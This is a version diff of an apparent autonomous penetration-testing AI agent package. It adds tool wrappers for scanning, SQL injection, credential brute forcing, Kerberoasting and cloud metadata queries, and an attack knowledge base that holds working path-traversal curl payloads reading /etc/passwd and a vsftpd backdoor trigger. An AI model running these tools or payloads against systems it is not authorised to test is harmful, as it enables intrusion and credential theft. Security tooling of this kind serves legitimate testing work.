pentesting 0.40.2 → 0.40.3

package/dist/main.js

@@ -306,7 +306,7 @@ var ORPHAN_PROCESS_NAMES = [
 
 // src/shared/constants/agent.ts
 var APP_NAME = "Pentest AI";
-var APP_VERSION = "0.40.2";
+var APP_VERSION = "0.40.3";
 var APP_DESCRIPTION = "Autonomous Penetration Testing AI Agent";
 var LLM_ROLES = {
   SYSTEM: "system",
@@ -2139,7 +2139,7 @@ var StateSerializer = class {
     if (todo.length > 0) {
       lines.push(`TODO (${todo.length}):`);
       for (const t of todo.slice(0, DISPLAY_LIMITS.COMPACT_LIST_ITEMS)) {
-        const status = t.status === "done" ? "[x]" : t.status === "in_progress" ? "[->]" : "[ ]";
+        const status = t.status === TODO_STATUSES.DONE ? "[x]" : t.status === TODO_STATUSES.IN_PROGRESS ? "[->]" : "[ ]";
         lines.push(`  ${status} ${t.content} (${t.priority})`);
       }
     }
@@ -2603,6 +2603,13 @@ var PersistentMemory = class {
   getSuccessfulTechniques(service) {
     return this.knowledge.successfulTechniques.filter((t) => t.service.toLowerCase().includes(service.toLowerCase())).sort((a, b) => b.successCount - a.successCount);
   }
+  /**
+   * Clear all knowledge (for testing isolation).
+   */
+  clear() {
+    this.knowledge = { successfulTechniques: [], failurePatterns: [], techFacts: [] };
+    this.save();
+  }
   /**
    * Format for prompt injection (most relevant persistent knowledge).
    */
@@ -7121,6 +7128,548 @@ Returns recommendations on process status, port conflicts, long-running tasks, e
   }
 ];
 
+// src/domains/network/tools.ts
+var NETWORK_TOOLS = [
+  {
+    name: TOOL_NAMES.NMAP_QUICK,
+    description: "Quick nmap scan - fast discovery",
+    parameters: {
+      target: { type: "string", description: "Target IP/CIDR" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      const target = params.target;
+      return await runCommand("nmap", ["-Pn", "-T4", "-F", target]);
+    }
+  },
+  {
+    name: TOOL_NAMES.NMAP_FULL,
+    description: "Full nmap scan - comprehensive",
+    parameters: {
+      target: { type: "string", description: "Target IP/CIDR" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      const target = params.target;
+      return await runCommand("nmap", ["-Pn", "-T4", "-sV", "-O", "-p-", target]);
+    }
+  },
+  {
+    name: TOOL_NAMES.RUSTSCAN,
+    description: "RustScan - very fast port discovery",
+    parameters: {
+      target: { type: "string", description: "Target IP" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      const target = params.target;
+      return await runCommand("rustscan", ["-a", target, "--range", "1-65535"]);
+    }
+  }
+];
+var NETWORK_CONFIG2 = {
+  name: SERVICE_CATEGORIES.NETWORK,
+  description: "Network reconnaissance - scanning, OS fingerprinting",
+  tools: NETWORK_TOOLS,
+  dangerLevel: DANGER_LEVELS.ACTIVE,
+  defaultApproval: APPROVAL_LEVELS.CONFIRM,
+  commonPorts: [21, 22, 80, 443, 445, 3389, 8080],
+  commonServices: [SERVICES.FTP, SERVICES.SSH, SERVICES.HTTP, SERVICES.HTTPS, SERVICES.SMB]
+};
+
+// src/domains/web/tools.ts
+var WEB_TOOLS = [
+  {
+    name: TOOL_NAMES.HTTP_FINGERPRINT,
+    description: "HTTP fingerprinting - detect WAF, server type",
+    parameters: {
+      target: { type: "string", description: "Target URL" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      const target = params.target;
+      return await runCommand("curl", ["-sI", target]);
+    }
+  },
+  {
+    name: TOOL_NAMES.WAF_DETECT,
+    description: "WAF detection using wafw00f",
+    parameters: {
+      target: { type: "string", description: "Target URL" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      const target = params.target;
+      return await runCommand("wafw00f", [target]);
+    }
+  },
+  {
+    name: TOOL_NAMES.DIRSEARCH,
+    description: "Directory bruteforcing",
+    parameters: {
+      target: { type: "string", description: "Target URL" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      const target = params.target;
+      return await runCommand("dirsearch", ["-u", target, "--quiet"]);
+    }
+  },
+  {
+    name: TOOL_NAMES.NUCLEI_WEB,
+    description: "Nuclei web vulnerability scanner",
+    parameters: {
+      target: { type: "string", description: "Target URL" },
+      severity: { type: "string", description: "Severities to check" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      const target = params.target;
+      const severity = params.severity || "medium,critical,high";
+      return await runCommand("nuclei", ["-u", target, "-s", severity, "-silent"]);
+    }
+  }
+];
+var WEB_CONFIG = {
+  name: SERVICE_CATEGORIES.WEB,
+  description: "Web application testing - HTTP/HTTPS, APIs",
+  tools: WEB_TOOLS,
+  dangerLevel: DANGER_LEVELS.ACTIVE,
+  defaultApproval: APPROVAL_LEVELS.CONFIRM,
+  commonPorts: [80, 443, 8080],
+  commonServices: [SERVICES.HTTP, SERVICES.HTTPS]
+};
+
+// src/domains/database/tools.ts
+var DATABASE_TOOLS = [
+  {
+    name: TOOL_NAMES.SQLMAP_BASIC,
+    description: "SQL injection testing with sqlmap - basic scan",
+    parameters: {
+      target: { type: "string", description: "Target URL" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      const target = params.target;
+      return await runCommand("sqlmap", ["-u", target, "--batch", "--risk=1", "--level=1"]);
+    }
+  },
+  {
+    name: TOOL_NAMES.SQLMAP_ADVANCED,
+    description: "SQL injection with sqlmap - full enumeration",
+    parameters: {
+      target: { type: "string", description: "Target URL" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      const target = params.target;
+      return await runCommand("sqlmap", ["-u", target, "--batch", "--risk=3", "--level=5", "--dbs", "--tables"]);
+    }
+  },
+  {
+    name: TOOL_NAMES.MYSQL_ENUM,
+    description: "MySQL enumeration - version, users, databases",
+    parameters: {
+      target: { type: "string", description: "Target IP/hostname" },
+      port: { type: "string", description: "Port (default 3306)" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      const target = params.target;
+      const port = params.port || "3306";
+      return await runCommand("mysql", ["-h", target, "-P", port, "-e", "SELECT VERSION(), USER(), DATABASE();"]);
+    }
+  },
+  {
+    name: TOOL_NAMES.POSTGRES_ENUM,
+    description: "PostgreSQL enumeration",
+    parameters: {
+      target: { type: "string", description: "Target IP" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      const target = params.target;
+      return await runCommand("psql", ["-h", target, "-U", "postgres", "-c", "SELECT version(); SELECT datname FROM pg_database;"]);
+    }
+  },
+  {
+    name: TOOL_NAMES.REDIS_ENUM,
+    description: "Redis enumeration",
+    parameters: {
+      target: { type: "string", description: "Target IP" },
+      port: { type: "string", description: "Port (default 6379)" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      const target = params.target;
+      const port = params.port || "6379";
+      return await runCommand("redis-cli", ["-h", target, "-p", port, "INFO"]);
+    }
+  },
+  {
+    name: TOOL_NAMES.DB_BRUTE,
+    description: "Brute force database credentials",
+    parameters: {
+      target: { type: "string", description: "Target IP" },
+      service: { type: "string", description: "Service (mysql, postgres, etc.)" }
+    },
+    required: ["target", "service"],
+    execute: async (params) => {
+      const target = params.target;
+      const service = params.service || SERVICES.MYSQL;
+      return await runCommand("hydra", [
+        "-L",
+        WORDLISTS.USERNAMES,
+        "-P",
+        WORDLISTS.COMMON_PASSWORDS,
+        target,
+        service
+      ]);
+    }
+  }
+];
+var DATABASE_CONFIG = {
+  name: SERVICE_CATEGORIES.DATABASE,
+  description: "Database exploitation - SQL injection, credential extraction",
+  tools: DATABASE_TOOLS,
+  dangerLevel: DANGER_LEVELS.EXPLOIT,
+  defaultApproval: APPROVAL_LEVELS.REVIEW,
+  commonPorts: [1433, 3306, 5432, 6379, 27017],
+  commonServices: [SERVICES.MYSQL, SERVICES.POSTGRES, SERVICES.REDIS, SERVICES.MONGODB]
+};
+
+// src/domains/ad/tools.ts
+var AD_TOOLS = [
+  {
+    name: TOOL_NAMES.BLOODHOUND_COLLECT,
+    description: "BloodHound data collection",
+    parameters: {
+      target: { type: "string", description: "Target DC IP" },
+      domain: { type: "string", description: "Domain name" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      const target = params.target;
+      const domain = params.domain || "DOMAIN";
+      return await runCommand("bloodhound-python", ["-c", "All", "-d", domain, target, "--zip"]);
+    }
+  },
+  {
+    name: TOOL_NAMES.KERBEROAST,
+    description: "Kerberoasting attack",
+    parameters: {
+      target: { type: "string", description: "DC IP" },
+      user: { type: "string", description: "Domain user" },
+      password: { type: "string", description: "Password" }
+    },
+    required: ["target", "user", "password"],
+    execute: async (params) => {
+      const target = params.target;
+      return await runCommand("GetUserSPNs.py", ["-dc-ip", target, `${params.user}:${params.password}`]);
+    }
+  },
+  {
+    name: TOOL_NAMES.LDAP_ENUM,
+    description: "LDAP enumeration",
+    parameters: {
+      target: { type: "string", description: "LDAP Server" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      const target = params.target;
+      return await runCommand("ldapsearch", ["-x", "-H", `ldap://${target}`, "-b", ""]);
+    }
+  }
+];
+var AD_CONFIG = {
+  name: SERVICE_CATEGORIES.AD,
+  description: "Active Directory and Windows domain",
+  tools: AD_TOOLS,
+  dangerLevel: DANGER_LEVELS.EXPLOIT,
+  defaultApproval: APPROVAL_LEVELS.REVIEW,
+  commonPorts: [88, 389, 445],
+  commonServices: [SERVICES.AD, SERVICES.SMB]
+};
+
+// src/domains/email/tools.ts
+var EMAIL_TOOLS = [
+  {
+    name: TOOL_NAMES.SMTP_ENUM,
+    description: "SMTP user enumeration",
+    parameters: {
+      target: { type: "string", description: "SMTP server" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      return await runCommand("smtp-user-enum", ["-M", "VRFY", "-t", params.target]);
+    }
+  }
+];
+var EMAIL_CONFIG = {
+  name: SERVICE_CATEGORIES.EMAIL,
+  description: "Email services - SMTP, IMAP, POP3",
+  tools: EMAIL_TOOLS,
+  dangerLevel: DANGER_LEVELS.ACTIVE,
+  defaultApproval: APPROVAL_LEVELS.CONFIRM,
+  commonPorts: [25, 110, 143, 465, 587, 993, 995],
+  commonServices: [SERVICES.SMTP, SERVICES.POP3, SERVICES.IMAP]
+};
+
+// src/domains/remote-access/tools.ts
+var REMOTE_ACCESS_TOOLS = [
+  {
+    name: TOOL_NAMES.SSH_ENUM,
+    description: "SSH enumeration",
+    parameters: {
+      target: { type: "string", description: "SSH Server" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      return await runCommand("ssh-audit", [params.target]);
+    }
+  },
+  {
+    name: TOOL_NAMES.RDP_ENUM,
+    description: "RDP enumeration",
+    parameters: {
+      target: { type: "string", description: "RDP Server" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      return await runCommand("nmap", ["-p", "3389", "--script", "rdp-enum-encryption,rdp-ntlm-info", params.target]);
+    }
+  }
+];
+var REMOTE_ACCESS_CONFIG = {
+  name: SERVICE_CATEGORIES.REMOTE_ACCESS,
+  description: "Remote access services - SSH, RDP, VNC",
+  tools: REMOTE_ACCESS_TOOLS,
+  dangerLevel: DANGER_LEVELS.ACTIVE,
+  defaultApproval: APPROVAL_LEVELS.REVIEW,
+  commonPorts: [22, 3389, 5900],
+  commonServices: [SERVICES.SSH, SERVICES.RDP, SERVICES.VNC]
+};
+
+// src/domains/file-sharing/tools.ts
+var FILE_SHARING_TOOLS = [
+  {
+    name: TOOL_NAMES.FTP_ENUM,
+    description: "FTP enumeration",
+    parameters: {
+      target: { type: "string", description: "FTP Server" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      return await runCommand("nmap", ["-p", "21", "--script", "ftp-anon,ftp-syst", params.target]);
+    }
+  },
+  {
+    name: TOOL_NAMES.SMB_ENUM,
+    description: "SMB enumeration",
+    parameters: {
+      target: { type: "string", description: "SMB Server" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      return await runCommand("enum4linux", ["-a", params.target]);
+    }
+  }
+];
+var FILE_SHARING_CONFIG = {
+  name: SERVICE_CATEGORIES.FILE_SHARING,
+  description: "File sharing protocols - SMB, FTP, NFS",
+  tools: FILE_SHARING_TOOLS,
+  dangerLevel: DANGER_LEVELS.ACTIVE,
+  defaultApproval: APPROVAL_LEVELS.CONFIRM,
+  commonPorts: [21, 139, 445, 2049],
+  commonServices: [SERVICES.FTP, SERVICES.SMB, SERVICES.NFS]
+};
+
+// src/domains/cloud/tools.ts
+var CLOUD_TOOLS = [
+  {
+    name: TOOL_NAMES.AWS_S3_CHECK,
+    description: "S3 bucket security check",
+    parameters: {
+      bucket: { type: "string", description: "Bucket name" }
+    },
+    required: ["bucket"],
+    execute: async (params) => {
+      const bucket = params.bucket;
+      return await runCommand("aws", ["s3", "ls", `s3://${bucket}`, "--no-sign-request"]);
+    }
+  },
+  {
+    name: TOOL_NAMES.CLOUD_META_CHECK,
+    description: "Check cloud metadata service access",
+    parameters: {
+      provider: { type: "string", description: "aws, azure, or gcp" }
+    },
+    required: ["provider"],
+    execute: async (params) => {
+      const provider = params.provider;
+      if (provider === "aws") return await runCommand("curl", ["http://169.254.169.254/latest/meta-data/"]);
+      if (provider === "azure") return await runCommand("curl", ["-H", "Metadata:true", "http://169.254.169.254/metadata/instance?api-version=2021-02-01"]);
+      return await runCommand("curl", ["-H", "Metadata-Flavor: Google", "http://metadata.google.internal/computeMetadata/v1/"]);
+    }
+  }
+];
+var CLOUD_CONFIG = {
+  name: SERVICE_CATEGORIES.CLOUD,
+  description: "Cloud infrastructure - AWS, Azure, GCP",
+  tools: CLOUD_TOOLS,
+  dangerLevel: DANGER_LEVELS.EXPLOIT,
+  defaultApproval: APPROVAL_LEVELS.REVIEW,
+  commonPorts: [443],
+  commonServices: [SERVICES.HTTP, SERVICES.HTTPS]
+};
+
+// src/domains/container/tools.ts
+var CONTAINER_TOOLS = [
+  {
+    name: TOOL_NAMES.DOCKER_PS,
+    description: "List running Docker containers",
+    parameters: {
+      host: { type: "string", description: "Docker host" }
+    },
+    required: ["host"],
+    execute: async (params) => {
+      return await runCommand("docker", ["-H", params.host, "ps"]);
+    }
+  },
+  {
+    name: TOOL_NAMES.KUBE_GET_PODS,
+    description: "List Kubernetes pods",
+    parameters: {
+      context: { type: "string", description: "Kube context" }
+    },
+    required: ["context"],
+    execute: async (params) => {
+      return await runCommand("kubectl", ["--context", params.context, "get", "pods"]);
+    }
+  }
+];
+var CONTAINER_CONFIG = {
+  name: SERVICE_CATEGORIES.CONTAINER,
+  description: "Container platforms - Docker, Kubernetes",
+  tools: CONTAINER_TOOLS,
+  dangerLevel: DANGER_LEVELS.EXPLOIT,
+  defaultApproval: APPROVAL_LEVELS.REVIEW,
+  commonPorts: [2375, 2376, 5e3, 6443],
+  commonServices: [SERVICES.DOCKER, SERVICES.KUBERNETES]
+};
+
+// src/domains/api/tools.ts
+var API_TOOLS = [
+  {
+    name: TOOL_NAMES.API_DISCOVER,
+    description: "API endpoint discovery - using Arjun",
+    parameters: {
+      target: { type: "string", description: "Target URL" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      const target = params.target;
+      return await runCommand("arjun", ["-u", target, "-t", "20"]);
+    }
+  },
+  {
+    name: TOOL_NAMES.GRAPHQL_INTROSPECT,
+    description: "GraphQL introspection - schema discovery",
+    parameters: {
+      target: { type: "string", description: "GQL Endpoint" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      const target = params.target;
+      return await runCommand("curl", ["-X", "POST", target, "-H", "Content-Type: application/json", "-d", '{"query":"{__schema {queryType {name}}}"}']);
+    }
+  },
+  {
+    name: TOOL_NAMES.SWAGGER_PARSE,
+    description: "Parse Swagger/OpenAPI specification",
+    parameters: {
+      spec: { type: "string", description: "URL to swagger.json/yaml" }
+    },
+    required: ["spec"],
+    execute: async (params) => {
+      const spec = params.spec;
+      return await runCommand("swagger-codegen", ["generate", "-i", spec, "-l", "html2"]);
+    }
+  },
+  {
+    name: TOOL_NAMES.API_FUZZ,
+    description: "General API fuzzing",
+    parameters: {
+      target: { type: "string", description: "Base API URL" },
+      wordlist: { type: "string", description: "Wordlist path" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      const target = params.target;
+      const wordlist = params.wordlist || WORDLISTS.API_FUZZ;
+      return await runCommand("ffuf", ["-u", `${target}/FUZZ`, "-w", wordlist, "-mc", "all"]);
+    }
+  }
+];
+var API_CONFIG = {
+  name: SERVICE_CATEGORIES.API,
+  description: "API testing - REST, GraphQL, SOAP",
+  tools: API_TOOLS,
+  dangerLevel: DANGER_LEVELS.ACTIVE,
+  defaultApproval: APPROVAL_LEVELS.CONFIRM,
+  commonPorts: [3e3, 5e3, 8e3, 8080],
+  commonServices: [SERVICES.HTTP, SERVICES.HTTPS]
+};
+
+// src/domains/wireless/tools.ts
+var WIRELESS_TOOLS = [
+  {
+    name: TOOL_NAMES.WIFI_SCAN,
+    description: "WiFi network scanning",
+    parameters: {
+      interface: { type: "string", description: "Wireless interface" }
+    },
+    required: ["interface"],
+    execute: async (params) => {
+      return await runCommand("iwlist", [params.interface, "scanning"]);
+    }
+  }
+];
+var WIRELESS_CONFIG = {
+  name: SERVICE_CATEGORIES.WIRELESS,
+  description: "Wireless security - WiFi, Bluetooth",
+  tools: WIRELESS_TOOLS,
+  dangerLevel: DANGER_LEVELS.ACTIVE,
+  defaultApproval: APPROVAL_LEVELS.REVIEW,
+  commonPorts: [],
+  commonServices: [SERVICES.WIFI, SERVICES.BLUETOOTH]
+};
+
+// src/domains/ics/tools.ts
+var ICS_TOOLS = [
+  {
+    name: TOOL_NAMES.MODBUS_ENUM,
+    description: "Modbus enumeration",
+    parameters: {
+      target: { type: "string", description: "ICS Device" }
+    },
+    required: ["target"],
+    execute: async (params) => {
+      return await runCommand("nmap", ["-p", "502", "--script", "modbus-discover", params.target]);
+    }
+  }
+];
+var ICS_CONFIG = {
+  name: SERVICE_CATEGORIES.ICS,
+  description: "Industrial control systems - Modbus, DNP3, EtherNet/IP",
+  tools: ICS_TOOLS,
+  dangerLevel: DANGER_LEVELS.ACTIVE,
+  defaultApproval: APPROVAL_LEVELS.BLOCK,
+  commonPorts: [502, 2e4],
+  commonServices: [SERVICES.MODBUS, SERVICES.DNP3]
+};
+
 // src/engine/tools.ts
 var ToolRegistry = class {
   constructor(state, scopeGuard, approvalGate, events) {
@@ -7137,7 +7686,20 @@ var ToolRegistry = class {
       ...createPentestTools(this.state),
       ...createAgentTools(),
       ...createNetworkAttackTools(),
-      ...resourceTools
+      ...resourceTools,
+      // Domain-specific tools (§3-3)
+      ...NETWORK_TOOLS,
+      ...WEB_TOOLS,
+      ...DATABASE_TOOLS,
+      ...AD_TOOLS,
+      ...EMAIL_TOOLS,
+      ...REMOTE_ACCESS_TOOLS,
+      ...FILE_SHARING_TOOLS,
+      ...CLOUD_TOOLS,
+      ...CONTAINER_TOOLS,
+      ...API_TOOLS,
+      ...WIRELESS_TOOLS,
+      ...ICS_TOOLS
     ];
     allTools.forEach((t) => this.tools.set(t.name, t));
   }
@@ -8979,22 +9541,22 @@ Please decide how to handle this error and continue.`;
   /** Tools that are safe to run in parallel (read-only or per-key state mutations) */
   static PARALLEL_SAFE_TOOLS = /* @__PURE__ */ new Set([
     // Read-only intelligence tools
-    "get_state",
-    "parse_nmap",
-    "search_cve",
-    "web_search",
-    "browse_url",
-    "read_file",
-    "get_owasp_knowledge",
-    "get_web_attack_surface",
-    "get_cve_info",
-    "fill_form",
+    TOOL_NAMES.GET_STATE,
+    TOOL_NAMES.PARSE_NMAP,
+    TOOL_NAMES.SEARCH_CVE,
+    TOOL_NAMES.WEB_SEARCH,
+    TOOL_NAMES.BROWSE_URL,
+    TOOL_NAMES.READ_FILE,
+    TOOL_NAMES.GET_OWASP_KNOWLEDGE,
+    TOOL_NAMES.GET_WEB_ATTACK_SURFACE,
+    TOOL_NAMES.GET_CVE_INFO,
+    TOOL_NAMES.FILL_FORM,
     // State recording (per-key mutations, no external side effects)
-    "add_target",
-    "add_finding",
-    "add_loot",
-    "update_mission",
-    "update_todo"
+    TOOL_NAMES.ADD_TARGET,
+    TOOL_NAMES.ADD_FINDING,
+    TOOL_NAMES.ADD_LOOT,
+    TOOL_NAMES.UPDATE_MISSION,
+    TOOL_NAMES.UPDATE_TODO
   ]);
   async processToolCalls(toolCalls, progress) {
     if (toolCalls.length <= 1) {
@@ -9308,6 +9870,233 @@ function getTimeAdaptiveStrategy(elapsedMs, deadlineMs) {
   };
 }
 
+// src/shared/constants/service-ports.ts
+var SERVICE_PORTS = {
+  SSH: 22,
+  FTP: 21,
+  TELNET: 23,
+  SMTP: 25,
+  DNS: 53,
+  HTTP: 80,
+  POP3: 110,
+  IMAP: 143,
+  SMB_NETBIOS: 139,
+  SMB: 445,
+  HTTPS: 443,
+  MSSQL: 1433,
+  MYSQL: 3306,
+  RDP: 3389,
+  POSTGRESQL: 5432,
+  REDIS: 6379,
+  HTTP_ALT: 8080,
+  HTTPS_ALT: 8443,
+  MONGODB: 27017,
+  ELASTICSEARCH: 9200,
+  MEMCACHED: 11211,
+  NODE_DEFAULT: 3e3,
+  FLASK_DEFAULT: 5e3,
+  DJANGO_DEFAULT: 8e3
+};
+var CRITICAL_SERVICE_PORTS = [
+  SERVICE_PORTS.SSH,
+  SERVICE_PORTS.RDP,
+  SERVICE_PORTS.MYSQL,
+  SERVICE_PORTS.POSTGRESQL,
+  SERVICE_PORTS.REDIS,
+  SERVICE_PORTS.MONGODB
+];
+var NO_AUTH_CRITICAL_PORTS = [
+  SERVICE_PORTS.REDIS,
+  SERVICE_PORTS.MONGODB,
+  SERVICE_PORTS.ELASTICSEARCH,
+  SERVICE_PORTS.MEMCACHED
+];
+var WEB_SERVICE_PORTS = [
+  SERVICE_PORTS.HTTP,
+  SERVICE_PORTS.HTTPS,
+  SERVICE_PORTS.HTTP_ALT,
+  SERVICE_PORTS.HTTPS_ALT,
+  SERVICE_PORTS.NODE_DEFAULT,
+  SERVICE_PORTS.FLASK_DEFAULT,
+  SERVICE_PORTS.DJANGO_DEFAULT
+];
+var PLAINTEXT_HTTP_PORTS = [
+  SERVICE_PORTS.HTTP,
+  SERVICE_PORTS.HTTP_ALT,
+  SERVICE_PORTS.NODE_DEFAULT
+];
+var DATABASE_PORTS = [
+  SERVICE_PORTS.MYSQL,
+  SERVICE_PORTS.POSTGRESQL,
+  SERVICE_PORTS.MSSQL,
+  SERVICE_PORTS.MONGODB,
+  SERVICE_PORTS.REDIS
+];
+var SMB_PORTS = [
+  SERVICE_PORTS.SMB,
+  SERVICE_PORTS.SMB_NETBIOS
+];
+
+// src/shared/constants/scoring.ts
+var ATTACK_SCORING = {
+  /** Base score for all attack prioritization */
+  BASE_SCORE: 50,
+  /** Maximum possible score */
+  MAX_SCORE: 100,
+  /** Bonus for critical infrastructure services (SSH, RDP, DB, etc.) */
+  CRITICAL_SERVICE_BONUS: 20,
+  /** Bonus when service version is known (enables CVE lookup) */
+  VERSION_KNOWN_BONUS: 15,
+  /** Bonus when known critical CVE exists for the service version */
+  CRITICAL_CVE_BONUS: 30,
+  /** Bonus for sensitive services running without authentication */
+  NO_AUTH_BONUS: 25,
+  /** Bonus for plaintext HTTP on service ports (no HTTPS) */
+  PLAINTEXT_HTTP_BONUS: 10
+};
+
+// src/shared/utils/attack-knowledge-base.ts
+var SERVICE_VULN_MAP = {
+  // Apache
+  "apache/2.4.49": {
+    cves: ["CVE-2021-41773"],
+    exploits: ['curl --path-as-is "http://TARGET/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"'],
+    priority: "critical",
+    checks: ["Path traversal to RCE"]
+  },
+  "apache/2.4.50": {
+    cves: ["CVE-2021-42013"],
+    exploits: ['curl --path-as-is "http://TARGET/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"'],
+    priority: "critical",
+    checks: ["Path traversal bypass"]
+  },
+  // SSH
+  "openssh/7.2": {
+    cves: ["CVE-2016-10009", "CVE-2016-10010"],
+    exploits: ["Check for Roaming auth bypass"],
+    priority: "medium",
+    checks: ["Version disclosure", "Weak algorithms"]
+  },
+  // vsftpd
+  "vsftpd/2.3.4": {
+    cves: ["CVE-2011-2523"],
+    exploits: ["Connect with username containing :) to trigger backdoor on port 6200"],
+    priority: "critical",
+    checks: ["Backdoor trigger: user:)"]
+  },
+  // SMB
+  "samba/3.0": {
+    cves: ["CVE-2004-0882"],
+    exploits: ["trans2open exploit"],
+    priority: "high",
+    checks: ["SMBv1 enabled"]
+  },
+  "smb": {
+    cves: ["MS17-010"],
+    exploits: ["EternalBlue exploit"],
+    priority: "critical",
+    checks: ["nmap --script smb-vuln-ms17-010"]
+  },
+  // MySQL
+  "mysql/5.0": {
+    cves: ["CVE-2012-2122"],
+    exploits: ["MariaDB/CMySQL authentication bypass"],
+    priority: "high",
+    checks: ["Try root without password", "mysql -u root"]
+  },
+  // Redis
+  "redis": {
+    cves: [],
+    exploits: ["Unauthenticated RCE via CONFIG SET dir + SLAVEOF"],
+    priority: "critical",
+    checks: ["redis-cli -h TARGET ping", "CONFIG GET dir"]
+  },
+  // Jenkins
+  "jenkins": {
+    cves: [],
+    exploits: ["Script Console RCE", "CVE-2019-1003000"],
+    priority: "high",
+    checks: ["/scriptText endpoint", "/manage/scriptConsole"]
+  },
+  // Elasticsearch
+  "elasticsearch/1": {
+    cves: ["CVE-2014-3120"],
+    exploits: ["Groovy sandbox bypass RCE"],
+    priority: "critical",
+    checks: ["Dynamic script execution"]
+  }
+};
+
+// src/shared/utils/attack-intelligence.ts
+function calculateAttackPriority(findings) {
+  let score = ATTACK_SCORING.BASE_SCORE;
+  if (CRITICAL_SERVICE_PORTS.includes(findings.port)) {
+    score += ATTACK_SCORING.CRITICAL_SERVICE_BONUS;
+  }
+  if (findings.version) {
+    score += ATTACK_SCORING.VERSION_KNOWN_BONUS;
+    const key = `${findings.service.toLowerCase()}/${findings.version.split(".")[0]}`;
+    if (SERVICE_VULN_MAP[key]?.priority === "critical") {
+      score += ATTACK_SCORING.CRITICAL_CVE_BONUS;
+    }
+  }
+  if (!findings.hasAuth && NO_AUTH_CRITICAL_PORTS.includes(findings.port)) {
+    score += ATTACK_SCORING.NO_AUTH_BONUS;
+  }
+  if (PLAINTEXT_HTTP_PORTS.includes(findings.port) && !findings.isHttps) {
+    score += ATTACK_SCORING.PLAINTEXT_HTTP_BONUS;
+  }
+  return Math.min(score, ATTACK_SCORING.MAX_SCORE);
+}
+function getAttacksForService(service, port) {
+  const attacks = [];
+  const svc = service.toLowerCase();
+  if (WEB_SERVICE_PORTS.includes(port)) {
+    attacks.push(
+      "OWASP-A01: Directory brute force",
+      "OWASP-A03: SQLi testing",
+      "OWASP-A03: XSS testing",
+      "OWASP-A05: Header analysis",
+      "OWASP-A10: SSRF testing",
+      "OWASP-A06: Version fingerprinting"
+    );
+  }
+  if (port === SERVICE_PORTS.SSH || svc.includes("ssh")) {
+    attacks.push(
+      "SSH version scan",
+      "Brute force common credentials",
+      "SSH key enumeration",
+      "Check for weak algorithms"
+    );
+  }
+  if (SMB_PORTS.includes(port) || svc.includes("smb")) {
+    attacks.push(
+      "MS17-010 EternalBlue check",
+      "SMB enumeration",
+      "Null session test",
+      "Share enumeration"
+    );
+  }
+  if (DATABASE_PORTS.includes(port) || svc.includes("sql") || svc.includes("mongo") || svc.includes("redis")) {
+    attacks.push(
+      "Default credential test",
+      "Unauthenticated access check",
+      "SQLi through web app",
+      "UDF injection",
+      "NoSQL injection"
+    );
+  }
+  if (port === SERVICE_PORTS.FTP || svc.includes("ftp")) {
+    attacks.push(
+      "Anonymous login test",
+      "Brute force credentials",
+      "VSFTPD backdoor check",
+      "Directory traversal"
+    );
+  }
+  return attacks;
+}
+
 // src/agents/prompt-builder.ts
 var __dirname4 = dirname5(fileURLToPath4(import.meta.url));
 var PROMPTS_DIR = join10(__dirname4, "prompts");
@@ -9371,6 +10160,7 @@ var PromptBuilder = class {
    * 8. Time awareness + adaptive strategy (#8)
    * 9. Challenge analysis (#2: Auto-Prompter)
    * 10. Attack graph (#6: recommended attack chains)
+   * 10b. Attack intelligence — per-service attack suggestions
    * 11. Working memory (#12: failed/succeeded attempts)
    * 12. Session timeline (#12: episodic memory)
    * 13. Learned techniques (#7: dynamic technique library)
@@ -9392,6 +10182,8 @@ var PromptBuilder = class {
       // #2
       this.getAttackGraphFragment(),
       // #6
+      this.getAttackIntelligenceFragment(),
+      // service-specific attacks
       this.getWorkingMemoryFragment(),
       // #12
       this.getEpisodicMemoryFragment(),
@@ -9545,6 +10337,30 @@ ${strategy.directive}
   getAttackGraphFragment() {
     return this.state.attackGraph.toPrompt();
   }
+  // --- Attack Intelligence: per-service bootstrapped attack suggestions ---
+  getAttackIntelligenceFragment() {
+    const targets = this.state.getAllTargets();
+    if (targets.length === 0) return "";
+    const lines = [];
+    for (const target of targets) {
+      for (const port of target.ports) {
+        const attacks = getAttacksForService(port.service || "", port.port);
+        if (attacks.length === 0) continue;
+        const priority = calculateAttackPriority({
+          service: port.service || "",
+          version: port.version,
+          port: port.port
+        });
+        lines.push(`[${target.ip}:${port.port}] ${port.service || "unknown"} (priority: ${priority}/100)`);
+        attacks.forEach((a) => lines.push(`  - ${a}`));
+      }
+    }
+    if (lines.length === 0) return "";
+    return `<attack-intelligence>
+Bootstrap attack suggestions (try these first, adapt if they fail):
+${lines.join("\n")}
+</attack-intelligence>`;
+  }
   // --- Improvement #12: Working Memory ---
   getWorkingMemoryFragment() {
     return this.state.workingMemory.toPrompt();

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "pentesting",
-  "version": "0.40.2",
+  "version": "0.40.3",
   "description": "Autonomous Penetration Testing AI Agent",
   "type": "module",
   "main": "dist/main.js",